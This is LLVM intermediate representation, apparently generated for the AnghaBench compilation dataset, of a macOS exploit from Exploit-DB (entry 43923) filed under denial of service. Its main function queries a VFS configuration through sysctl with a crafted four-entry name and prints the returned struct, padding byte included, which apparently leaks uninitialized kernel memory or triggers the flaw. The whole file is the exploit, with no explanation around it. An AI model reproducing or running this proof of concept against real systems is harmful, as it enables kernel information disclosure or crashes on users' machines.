; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/macos/dos/extr_43923.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/macos/dos/extr_43923.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.vfsconf_withpad = type { i8*, i32, i32, i32, i32 }

@CTL_VFS = common dso_local global i32 0, align 4
@VFS_GENERIC = common dso_local global i32 0, align 4
@VFS_CONF = common dso_local global i32 0, align 4
@main.conf = internal global %struct.vfsconf_withpad zeroinitializer, align 8
@.str = private unnamed_addr constant [7 x i8] c"sysctl\00", align 1
@.str.1 = private unnamed_addr constant [23 x i8] c"outlen != sizeof(conf)\00", align 1
@.str.2 = private unnamed_addr constant [58 x i8] c"name=%.15s pad1=0x%02hhx typenum=%d refcount=%d flags=%d\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca [4 x i32], align 16
  %3 = alloca i64, align 8
  store i32 0, i32* %1, align 4
  %4 = getelementptr inbounds [4 x i32], [4 x i32]* %2, i64 0, i64 0
  %5 = load i32, i32* @CTL_VFS, align 4
  store i32 %5, i32* %4, align 4
  %6 = getelementptr inbounds i32, i32* %4, i64 1
  %7 = load i32, i32* @VFS_GENERIC, align 4
  store i32 %7, i32* %6, align 4
  %8 = getelementptr inbounds i32, i32* %6, i64 1
  %9 = load i32, i32* @VFS_CONF, align 4
  store i32 %9, i32* %8, align 4
  %10 = getelementptr inbounds i32, i32* %8, i64 1
  store i32 23, i32* %10, align 4
  store i64 24, i64* %3, align 8
  %11 = getelementptr inbounds [4 x i32], [4 x i32]* %2, i64 0, i64 0
  %12 = call i64 @sysctl(i32* %11, i32 4, %struct.vfsconf_withpad* @main.conf, i64* %3, i32* null, i32 0)
  %13 = icmp ne i64 %12, 0
  br i1 %13, label %14, label %16

14:                                               ; preds = %0
  %15 = call i32 @err(i32 1, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i64 0, i64 0))
  br label %16

16:                                               ; preds = %14, %0
  %17 = load i64, i64* %3, align 8
  %18 = icmp ne i64 %17, 24
  br i1 %18, label %19, label %21

19:                                               ; preds = %16
  %20 = call i32 @errx(i32 1, i8* getelementptr inbounds ([23 x i8], [23 x i8]* @.str.1, i64 0, i64 0))
  br label %21

21:                                               ; preds = %19, %16
  %22 = load i8*, i8** getelementptr inbounds (%struct.vfsconf_withpad, %struct.vfsconf_withpad* @main.conf, i32 0, i32 0), align 8
  %23 = load i32, i32* getelementptr inbounds (%struct.vfsconf_withpad, %struct.vfsconf_withpad* @main.conf, i32 0, i32 4), align 4
  %24 = load i32, i32* getelementptr inbounds (%struct.vfsconf_withpad, %struct.vfsconf_withpad* @main.conf, i32 0, i32 3), align 8
  %25 = load i32, i32* getelementptr inbounds (%struct.vfsconf_withpad, %struct.vfsconf_withpad* @main.conf, i32 0, i32 2), align 4
  %26 = load i32, i32* getelementptr inbounds (%struct.vfsconf_withpad, %struct.vfsconf_withpad* @main.conf, i32 0, i32 1), align 8
  %27 = call i32 @printf(i8* getelementptr inbounds ([58 x i8], [58 x i8]* @.str.2, i64 0, i64 0), i8* %22, i32 %23, i32 %24, i32 %25, i32 %26)
  %28 = load i32, i32* %1, align 4
  ret i32 %28
}

declare dso_local i64 @sysctl(i32*, i32, %struct.vfsconf_withpad*, i64*, i32*, i32) #1

declare dso_local i32 @err(i32, i8*) #1

declare dso_local i32 @errx(i32, i8*) #1

declare dso_local i32 @printf(i8*, i8*, i32, i32, i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
